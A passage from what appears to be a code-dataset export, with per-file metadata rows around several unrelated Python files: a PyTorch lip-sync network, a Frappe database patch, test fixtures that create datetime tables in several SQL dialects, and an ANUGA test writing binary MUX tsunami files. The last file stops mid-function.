0.998,
0.998,
0.998,
0.998,
0.999,
0.999,
0.999,
0.999,
1.000,
1.000,
1.000
])
| 24.920477 | 24 | 0.160949 | 2,010 | 25,070 | 2.006965 | 0.041791 | 0.366882 | 0.458602 | 0.713932 | 0.935796 | 0.859445 | 0.855726 | 0.802429 | 0.802429 | 0.765741 | 0 | 0.662694 | 0.758995 | 25,070 | 1,005 | 25 | 24.945274 | 0.004965 | 0 | 0 | 0.996016 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.000996 | 0 | 0.000996 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
c4343e9c3fe561b42bb0ce0cdc3fa6ef19e3897c | 7,321 | py | Python | models/syncnet_hd.py | wuchangsheng951/HD_wav2lip_f | f93676e87efba42556c3b5ae1c3c7aa80bc9188e | [
"MIT"
] | 1 | 2021-05-16T11:47:30.000Z | 2021-05-16T11:47:30.000Z | models/syncnet_hd.py | wuchangsheng951/HD_wav2lip_f | f93676e87efba42556c3b5ae1c3c7aa80bc9188e | [
"MIT"
] | 1 | 2021-05-16T11:47:17.000Z | 2021-05-16T13:02:27.000Z | models/syncnet_hd.py | wuchangsheng951/HD_wav2lip_f | f93676e87efba42556c3b5ae1c3c7aa80bc9188e | [
"MIT"
] | null | null | null |
import torch
from torch import nn
from torch.nn import functional as F
from .conv import Conv2d
# from conv import Conv2d
class SyncNet_color(nn.Module):
def __init__(self):
super(SyncNet_color, self).__init__()
self.face_encoder = nn.Sequential(
Conv2d(15, 32, kernel_size=(7, 7), stride=1, padding=3),
Conv2d(32, 64, kernel_size=5, stride=(1, 2), padding=1),
Conv2d(64, 64, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(64, 64, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(64, 128, kernel_size=3, stride=2, padding=1),
Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(128, 256, kernel_size=3, stride=2, padding=1),
Conv2d(256, 256, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(256, 256, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(256, 512, kernel_size=3, stride=2, padding=1),
Conv2d(512, 512, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(512, 512, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(512, 512, kernel_size=3, stride=2, padding=1),
Conv2d(512, 512, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(512, 512, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(512, 512, kernel_size=3, stride=2, padding=1),
Conv2d(512, 512, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(512, 512, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(512, 512, kernel_size=3, stride=2, padding=1),
Conv2d(512, 512, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(512, 512, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(512, 512, kernel_size=3, stride=2, padding=1),
# Conv2d(512, 512, kernel_size=3, stride=1, padding=0),
Conv2d(512, 512, kernel_size=2, stride=1, padding=0),
)
self.audio_encoder = nn.Sequential(
Conv2d(1, 32, kernel_size=3, stride=1, padding=1),
Conv2d(32, 32, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(32, 32, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(32, 64, kernel_size=3, stride=(3, 1), padding=1),
Conv2d(64, 64, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(64, 64, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(64, 128, kernel_size=3, stride=3, padding=1),
Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(128, 256, kernel_size=3, stride=(3, 2), padding=1),
Conv2d(256, 256, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(256, 256, kernel_size=3, stride=1, padding=1, residual=True),
Conv2d(256, 512, kernel_size=3, stride=1, padding=0),
Conv2d(512, 512, kernel_size=1, stride=1, padding=0),)
def forward(self, audio_sequences, face_sequences): # audio_sequences := (B, dim, T)
face_embedding = self.face_encoder(face_sequences)
audio_embedding = self.audio_encoder(audio_sequences)
# print(face_embedding.shape, audio_embedding.shape)
audio_embedding = audio_embedding.view(audio_embedding.size(0), -1)
face_embedding = face_embedding.view(face_embedding.size(0), -1)
audio_embedding = F.normalize(audio_embedding, p=2, dim=1)
face_embedding = F.normalize(face_embedding, p=2, dim=1)
return audio_embedding, face_embedding
# class SyncNet_color(nn.Module):
# def __init__(self):
# super(SyncNet_color, self).__init__()
# self.face_encoder = nn.Sequential(
# Conv2d(15, 32, kernel_size=(7, 7), stride=1, padding=3),
# Conv2d(32, 64, kernel_size=5, stride=(1, 2), padding=1),
# Conv2d(64, 64, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(64, 64, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(64, 128, kernel_size=3, stride=2, padding=1),
# Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(128, 256, kernel_size=3, stride=2, padding=1),
# Conv2d(256, 256, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(256, 256, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(256, 512, kernel_size=3, stride=2, padding=1),
# Conv2d(512, 512, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(512, 512, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(512, 512, kernel_size=3, stride=2, padding=1),
# Conv2d(512, 512, kernel_size=3, stride=1, padding=0),
# Conv2d(512, 512, kernel_size=1, stride=1, padding=0),)
# self.audio_encoder = nn.Sequential(
# Conv2d(1, 32, kernel_size=3, stride=1, padding=1),
# Conv2d(32, 32, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(32, 32, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(32, 64, kernel_size=3, stride=(3, 1), padding=1),
# Conv2d(64, 64, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(64, 64, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(64, 128, kernel_size=3, stride=3, padding=1),
# Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(128, 256, kernel_size=(4,1), stride=1, padding=0),
# Conv2d(256, 256, kernel_size=3, stride=1, padding=1, residual=True),
# Conv2d(256, 512, kernel_size=3, stride=1, padding=1),
# # Conv2d(128, 512, kernel_size=3, stride=1, padding=0),
# # Conv2d(512, 512, kernel_size=1, stride=1, padding=0),
# )
# def forward(self, audio_sequences, face_sequences): # audio_sequences := (B, dim, T)
# face_embedding = self.face_encoder(face_sequences)
# audio_embedding = self.audio_encoder(audio_sequences)
# audio_embedding = audio_embedding.view(audio_embedding.size(0), -1)
# face_embedding = face_embedding.view(face_embedding.size(0), -1)
# audio_embedding = F.normalize(audio_embedding, p=2, dim=1)
# face_embedding = F.normalize(face_embedding, p=2, dim=1)
# return audio_embedding, face_embedding
if __name__ == "__main__":
x = torch.randn((32, 15, 128, 256))
mel = torch.randn((32, 1, 80, 16))
y = torch.randn((32, 1))
model = SyncNet_color()
a, v = model(mel, x)
| 44.640244 | 90 | 0.610709 | 1,042 | 7,321 | 4.148752 | 0.06142 | 0.164238 | 0.157761 | 0.243812 | 0.944946 | 0.941013 | 0.941013 | 0.941013 | 0.939394 | 0.939394 | 0 | 0.128228 | 0.243683 | 7,321 | 163 | 91 | 44.91411 | 0.652519 | 0.461139 | 0 | 0.4 | 0 | 0 | 0.002058 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.066667 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c485b5b10ab867163a1eab576b7d7b4acd962d9e | 131 | py | Python | frappe-bench/apps/erpnext/erpnext/patches/v8_0/addresses_linked_to_lead.py | Semicheche/foa_frappe_docker | a186b65d5e807dd4caf049e8aeb3620a799c1225 | [
"MIT"
] | null | null | null | frappe-bench/apps/erpnext/erpnext/patches/v8_0/addresses_linked_to_lead.py | Semicheche/foa_frappe_docker | a186b65d5e807dd4caf049e8aeb3620a799c1225 | [
"MIT"
] | null | null | null | frappe-bench/apps/erpnext/erpnext/patches/v8_0/addresses_linked_to_lead.py | Semicheche/foa_frappe_docker | a186b65d5e807dd4caf049e8aeb3620a799c1225 | [
"MIT"
] | null | null | null | import frappe
def execute():
frappe.db.sql("""UPDATE `tabDynamic Link` SET link_doctype = 'Lead' WHERE link_doctype = 'Load'""")
| 26.2 | 100 | 0.709924 | 18 | 131 | 5.055556 | 0.777778 | 0.241758 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129771 | 131 | 4 | 101 | 32.75 | 0.798246 | 0 | 0 | 0 | 0 | 0 | 0.59542 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
6718dfe4452e1d2f471fa308b4618a0cbc42637d | 43 | py | Python | roiextractors/extractors/suite2p/__init__.py | yarikoptic/roiextractors | bf538658097ef9ceb84abf04115ddf919a0c32dd | [
"BSD-3-Clause"
] | null | null | null | roiextractors/extractors/suite2p/__init__.py | yarikoptic/roiextractors | bf538658097ef9ceb84abf04115ddf919a0c32dd | [
"BSD-3-Clause"
] | null | null | null | roiextractors/extractors/suite2p/__init__.py | yarikoptic/roiextractors | bf538658097ef9ceb84abf04115ddf919a0c32dd | [
"BSD-3-Clause"
] | null | null | null | from .suite2psegmentationextractor import * | 43 | 43 | 0.883721 | 3 | 43 | 12.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025 | 0.069767 | 43 | 1 | 43 | 43 | 0.925 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
6774ca62e780a4a2bc800ca7092c1619fee3f506 | 7,572 | py | Python | tests/integration/records/records_datetime_fixture.py | cwegrzyn/records-mover | e3b71d6c09d99d0bcd6a956b9d09d20f8abe98d2 | [
"Apache-2.0"
] | 36 | 2020-03-17T11:56:51.000Z | 2022-01-19T16:03:32.000Z | tests/integration/records/records_datetime_fixture.py | cwegrzyn/records-mover | e3b71d6c09d99d0bcd6a956b9d09d20f8abe98d2 | [
"Apache-2.0"
] | 60 | 2020-03-02T23:13:29.000Z | 2021-05-19T15:05:42.000Z | tests/integration/records/records_datetime_fixture.py | cwegrzyn/records-mover | e3b71d6c09d99d0bcd6a956b9d09d20f8abe98d2 | [
"Apache-2.0"
] | 4 | 2020-08-11T13:17:37.000Z | 2021-11-05T21:11:52.000Z | from records_mover.db.quoting import quote_schema_and_table
from records_mover.utils.retry import bigquery_retry
from .datetime_cases import (
SAMPLE_YEAR, SAMPLE_MONTH, SAMPLE_DAY,
SAMPLE_HOUR, SAMPLE_MINUTE, SAMPLE_SECOND, SAMPLE_OFFSET, SAMPLE_LONG_TZ
)
from sqlalchemy.engine import Engine
import logging
logger = logging.getLogger(__name__)
class RecordsDatetimeFixture:
def __init__(self, engine: Engine, schema_name: str, table_name: str):
self.engine = engine
self.schema_name = schema_name
self.table_name = table_name
def quote_schema_and_table(self, schema, table):
return quote_schema_and_table(self.engine, schema, table)
@bigquery_retry()
def drop_table_if_exists(self, schema, table):
sql = f"DROP TABLE IF EXISTS {self.quote_schema_and_table(schema, table)}"
self.engine.execute(sql)
def createDateTimeTzTable(self) -> None:
if self.engine.name == 'redshift':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT '{SAMPLE_YEAR}-{SAMPLE_MONTH}-{SAMPLE_DAY} {SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d} {SAMPLE_LONG_TZ}'::TIMESTAMPTZ as timestamptz;
""" # noqa
elif self.engine.name == 'vertica':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT '{SAMPLE_YEAR}-{SAMPLE_MONTH}-{SAMPLE_DAY} {SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d} {SAMPLE_LONG_TZ}'::TIMESTAMPTZ as timestamptz;
""" # noqa
elif self.engine.name == 'bigquery':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT cast('{SAMPLE_YEAR}-{SAMPLE_MONTH}-{SAMPLE_DAY} {SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d} {SAMPLE_LONG_TZ}' AS TIMESTAMP) as timestamptz;
""" # noqa
elif self.engine.name == 'postgresql':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT '{SAMPLE_YEAR}-{SAMPLE_MONTH}-{SAMPLE_DAY} {SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d} {SAMPLE_LONG_TZ}'::TIMESTAMPTZ as "timestamptz";
""" # noqa
elif self.engine.name == 'mysql':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT TIMESTAMP '{SAMPLE_YEAR}-{SAMPLE_MONTH:02d}-{SAMPLE_DAY:02d} {SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d}.000000{SAMPLE_OFFSET}' AS "timestamptz";
""" # noqa
else:
raise NotImplementedError(f"Please teach me how to integration test {self.engine.name}")
self.engine.execute(create_tables)
def createDateTimeTable(self) -> None:
if self.engine.name == 'redshift':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT '{SAMPLE_YEAR}-{SAMPLE_MONTH}-{SAMPLE_DAY} {SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d}'::TIMESTAMP AS timestamp;
""" # noqa
elif self.engine.name == 'vertica':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT '{SAMPLE_YEAR}-{SAMPLE_MONTH}-{SAMPLE_DAY} {SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d}'::TIMESTAMP AS timestamp;
""" # noqa
elif self.engine.name == 'bigquery':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT cast('{SAMPLE_YEAR}-{SAMPLE_MONTH}-{SAMPLE_DAY} {SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d}' AS DATETIME) AS timestamp;
""" # noqa
elif self.engine.name == 'postgresql':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT '{SAMPLE_YEAR}-{SAMPLE_MONTH}-{SAMPLE_DAY} {SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d}'::TIMESTAMP AS "timestamp";
""" # noqa
elif self.engine.name == 'mysql':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT TIMESTAMP '{SAMPLE_YEAR}-{SAMPLE_MONTH}-{SAMPLE_DAY} {SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d}' AS "timestamp";
""" # noqa
else:
raise NotImplementedError(f"Please teach me how to integration test {self.engine.name}")
self.engine.execute(create_tables)
@bigquery_retry()
def createDateTable(self) -> None:
if self.engine.name == 'redshift':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT '{SAMPLE_YEAR}-{SAMPLE_MONTH}-{SAMPLE_DAY}'::DATE AS date;
""" # noqa
elif self.engine.name == 'vertica':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT '{SAMPLE_YEAR}-{SAMPLE_MONTH}-{SAMPLE_DAY}'::DATE AS date;
""" # noqa
elif self.engine.name == 'bigquery':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT cast('{SAMPLE_YEAR}-{SAMPLE_MONTH}-{SAMPLE_DAY}' as DATE) AS date;
""" # noqa
elif self.engine.name == 'postgresql':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT '{SAMPLE_YEAR}-{SAMPLE_MONTH}-{SAMPLE_DAY}'::DATE AS date;
""" # noqa
elif self.engine.name == 'mysql':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT DATE '{SAMPLE_YEAR}-{SAMPLE_MONTH}-{SAMPLE_DAY}' AS "date";
""" # noqa
else:
raise NotImplementedError(f"Please teach me how to integration test {self.engine.name}")
self.engine.execute(create_tables)
@bigquery_retry()
def createTimeTable(self):
if self.engine.name == 'redshift':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT '{SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d}' AS "time";
""" # noqa
elif self.engine.name == 'vertica':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT '{SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d}'::TIME AS "time";
""" # noqa
elif self.engine.name == 'bigquery':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT cast('{SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d}' as TIME) AS time;
""" # noqa
elif self.engine.name == 'postgresql':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT '{SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d}'::TIME AS "time";
""" # noqa
elif self.engine.name == 'mysql':
create_tables = f"""
CREATE TABLE {self.schema_name}.{self.table_name} AS
SELECT TIME '{SAMPLE_HOUR:02d}:{SAMPLE_MINUTE:02d}:{SAMPLE_SECOND:02d}' AS "time";
""" # noqa
else:
raise NotImplementedError(f"Please teach me how to integration test {self.engine.name}")
self.engine.execute(create_tables)
def drop_tables(self):
logger.info('Dropping tables...')
self.drop_table_if_exists(self.schema_name, f"{self.table_name}_frozen")
self.drop_table_if_exists(self.schema_name, self.table_name)
| 49.490196 | 180 | 0.634707 | 936 | 7,572 | 4.899573 | 0.084402 | 0.07065 | 0.073266 | 0.091147 | 0.851723 | 0.832098 | 0.823375 | 0.818142 | 0.782381 | 0.773005 | 0 | 0.017179 | 0.231247 | 7,572 | 152 | 181 | 49.815789 | 0.770658 | 0.013074 | 0 | 0.732394 | 0 | 0.077465 | 0.585615 | 0.334004 | 0 | 0 | 0 | 0 | 0 | 1 | 0.056338 | false | 0 | 0.035211 | 0.007042 | 0.105634 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
67844d45d98ba1653e01f55edc5957e9527f014e | 120 | py | Python | cfpq_data/graphs/__init__.py | viabzalov/CFPQ_Data | 67239c876897d04ba2f4ef88a75fd4a38a494efa | [
"Apache-2.0"
] | 8 | 2020-03-30T17:47:31.000Z | 2022-01-27T13:36:39.000Z | cfpq_data/graphs/__init__.py | viabzalov/CFPQ_Data | 67239c876897d04ba2f4ef88a75fd4a38a494efa | [
"Apache-2.0"
] | 27 | 2019-10-21T09:31:08.000Z | 2021-11-07T03:19:15.000Z | cfpq_data/graphs/__init__.py | viabzalov/CFPQ_Data | 67239c876897d04ba2f4ef88a75fd4a38a494efa | [
"Apache-2.0"
] | 14 | 2019-10-18T12:49:47.000Z | 2021-08-03T14:20:17.000Z | from cfpq_data.graphs.generators import *
from cfpq_data.graphs.readwrite import *
from cfpq_data.graphs.utils import *
| 30 | 41 | 0.825 | 18 | 120 | 5.333333 | 0.444444 | 0.25 | 0.375 | 0.5625 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 120 | 3 | 42 | 40 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
67a30dda56f065071f87b554f4b7debbd3fb8f23 | 62,320 | py | Python | anuga/file/tests/test_mux.py | samcom12/anuga_core | f4378114dbf02d666fe6423de45798add5c42806 | [
"Python-2.0",
"OLDAP-2.7"
] | null | null | null | anuga/file/tests/test_mux.py | samcom12/anuga_core | f4378114dbf02d666fe6423de45798add5c42806 | [
"Python-2.0",
"OLDAP-2.7"
] | null | null | null | anuga/file/tests/test_mux.py | samcom12/anuga_core | f4378114dbf02d666fe6423de45798add5c42806 | [
"Python-2.0",
"OLDAP-2.7"
] | null | null | null | #from builtins import zip
#from builtins import map
#from builtins import range
import unittest
import tempfile
import numpy as num
import os
from struct import pack, unpack
from anuga.file.netcdf import NetCDFFile
from anuga.utilities.numerical_tools import ensure_numeric
from anuga.coordinate_transforms.redfearn import redfearn
from anuga.coordinate_transforms.geo_reference import Geo_reference
from anuga.file.mux import WAVEHEIGHT_MUX_LABEL, EAST_VELOCITY_LABEL, \
NORTH_VELOCITY_LABEL
from anuga.file.mux import WAVEHEIGHT_MUX2_LABEL, EAST_VELOCITY_MUX2_LABEL, \
NORTH_VELOCITY_MUX2_LABEL
from anuga.file.mux import read_mux2_py
from anuga.file_conversion.urs2sts import urs2sts
from anuga.file.urs import Read_urs
class Test_Mux(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def write_mux(self, lat_long_points, time_step_count, time_step,
depth=None, ha=None, ua=None, va=None):
"""
This will write 3 non-gridded mux files, for testing.
If no quantities are passed in,
na and va quantities will be the Easting values.
Depth and ua will be the Northing value.
The mux file format has south as positive so
this function will swap the sign for va.
"""
#print "lat_long_points", lat_long_points
#print "time_step_count",time_step_count
#print "time_step",
points_num = len(lat_long_points)
lonlatdeps = []
quantities = ['HA','UA','VA']
mux_names = [WAVEHEIGHT_MUX_LABEL,
EAST_VELOCITY_LABEL,
NORTH_VELOCITY_LABEL]
quantities_init = [[],[],[]]
# urs binary is latitude fastest
for point in lat_long_points:
lat = point[0]
lon = point[1]
_ , e, n = redfearn(lat, lon)
if depth is None:
this_depth = n
else:
this_depth = depth
if ha is None:
this_ha = e
else:
this_ha = ha
if ua is None:
this_ua = n
else:
this_ua = ua
if va is None:
this_va = e
else:
this_va = va
lonlatdeps.append([lon, lat, this_depth])
quantities_init[0].append(this_ha) # HA
quantities_init[1].append(this_ua) # UA
quantities_init[2].append(this_va) # VA
file_handle, base_name = tempfile.mkstemp("")
os.close(file_handle)
os.remove(base_name)
files = []
for i, q in enumerate(quantities):
quantities_init[i] = ensure_numeric(quantities_init[i])
#print "HA_init", HA_init
q_time = num.zeros((time_step_count, points_num), num.float64)
for time in range(time_step_count):
q_time[time,:] = quantities_init[i] #* time * 4
#Write C files
columns = 3 # long, lat , depth
file = base_name + mux_names[i]
#print "base_name file",file
f = open(file, 'wb')
files.append(file)
f.write(pack('i',points_num))
f.write(pack('i',time_step_count))
f.write(pack('f',time_step))
#write lat/long info
for lonlatdep in lonlatdeps:
for float in lonlatdep:
f.write(pack('f',float))
# Write quantity info
for time in range(time_step_count):
for point_i in range(points_num):
f.write(pack('f',q_time[time,point_i]))
#print " mux_names[i]", mux_names[i]
#print "f.write(pack('f',q_time[time,i]))", q_time[time,point_i]
f.close()
return base_name, files
def delete_mux(self, files):
for file in files:
try:
os.remove(file)
except:
pass
def write_mux2(self, lat_long_points, time_step_count, time_step,
first_tstep, last_tstep,
depth=None, ha=None, ua=None, va=None):
"""
This will write 3 non-gridded mux files, for testing.
If no quantities are passed in,
na and va quantities will be the Easting values.
Depth and ua will be the Northing value.
"""
#print "lat_long_points", lat_long_points
#print "time_step_count",time_step_count
#print "time_step",
#irrelevant header information
ig=ilon=ilat=0
mcolat=mcolon=centerlat=centerlon=offset=az=baz=id=0.0
points_num = len(lat_long_points)
latlondeps = []
quantities = ['HA','UA','VA']
mux_names = [WAVEHEIGHT_MUX2_LABEL,
EAST_VELOCITY_MUX2_LABEL,
NORTH_VELOCITY_MUX2_LABEL]
msg='first_tstep and last_step arrays must have same length as number of points'
assert len(first_tstep)==points_num,msg
assert len(last_tstep)==points_num,msg
if depth is not None:
depth=ensure_numeric(depth)
assert len(depth)==points_num
if ha is not None:
ha=ensure_numeric(ha)
assert ha.shape==(points_num,time_step_count)
if ua is not None:
ua=ensure_numeric(ua)
assert ua.shape==(points_num,time_step_count)
if va is not None:
va=ensure_numeric(va)
assert va.shape==(points_num,time_step_count)
quantities_init = [[],[],[]]
# urs binary is latitude fastest
for i,point in enumerate(lat_long_points):
lat = point[0]
lon = point[1]
_ , e, n = redfearn(lat, lon)
if depth is None:
this_depth = n
else:
this_depth = depth[i]
latlondeps.append([lat, lon, this_depth])
if ha is None:
this_ha = e
quantities_init[0].append(num.ones(time_step_count,float)*this_ha) # HA
else:
quantities_init[0].append(ha[i])
if ua is None:
this_ua = n
quantities_init[1].append(num.ones(time_step_count,float)*this_ua) # UA
else:
quantities_init[1].append(ua[i])
if va is None:
this_va = e
quantities_init[2].append(num.ones(time_step_count,float)*this_va) #
else:
quantities_init[2].append(-va[i]) # South is negative in MUX
file_handle, base_name = tempfile.mkstemp("write_mux2")
os.close(file_handle)
os.remove(base_name)
files = []
for i, q in enumerate(quantities):
q_time = num.zeros((time_step_count, points_num), float)
quantities_init[i] = ensure_numeric(quantities_init[i])
for time in range(time_step_count):
#print i, q, time, quantities_init[i][:,time]
q_time[time,:] = quantities_init[i][:,time]
#print i, q, time, q_time[time, :]
#Write C files
columns = 3 # long, lat , depth
file = base_name + mux_names[i]
#print 'base_name file', file
f = open(file, 'wb')
files.append(file)
f.write(pack('i',points_num))
#write mux 2 header
for latlondep in latlondeps:
f.write(pack('f',latlondep[0]))
f.write(pack('f',latlondep[1]))
f.write(pack('f',mcolat))
f.write(pack('f',mcolon))
f.write(pack('i',ig))
f.write(pack('i',ilon))
f.write(pack('i',ilat))
f.write(pack('f',latlondep[2]))
f.write(pack('f',centerlat))
f.write(pack('f',centerlon))
f.write(pack('f',offset))
f.write(pack('f',az))
f.write(pack('f',baz))
f.write(pack('f',time_step))
f.write(pack('i',time_step_count))
for j in range(4): # identifier
f.write(pack('f',id))
#first_tstep=1
#last_tstep=time_step_count
for i,latlondep in enumerate(latlondeps):
f.write(pack('i',first_tstep[i]))
for i,latlondep in enumerate(latlondeps):
f.write(pack('i',last_tstep[i]))
# Find when first station starts recording
min_tstep = min(first_tstep)
# Find when all stations have stopped recording
max_tstep = max(last_tstep)
#for time in range(time_step_count):
for time in range(min_tstep-1,max_tstep):
f.write(pack('f',time*time_step))
for point_i in range(points_num):
if time+1>=first_tstep[point_i] and time+1<=last_tstep[point_i]:
#print 'writing', time, point_i, q_time[time, point_i]
f.write(pack('f', q_time[time, point_i]))
f.close()
return base_name, files
def test_urs2sts_read_mux2_pyI(self):
"""test_urs2sts_read_mux2_pyI(self):
Constant stage,momentum at each gauge
"""
tide = 1
time_step_count = 3
time_step = 2
lat_long_points =[(-21.5,114.5),(-21,114.5),(-21.5,115), (-21.,115.)]
n=len(lat_long_points)
first_tstep=num.ones(n,int)
last_tstep=time_step_count*num.ones(n,int)
depth=20*num.ones(n,float)
ha=2*num.ones((n,time_step_count),float)
ua=5*num.ones((n,time_step_count),float)
va=-10*num.ones((n,time_step_count),float)
#-ve added to take into account mux file format where south is positive.
base_name, files = self.write_mux2(lat_long_points,
time_step_count, time_step,
first_tstep, last_tstep,
depth=depth,
ha=ha,
ua=ua,
va=va)
weights=num.ones(1, float)
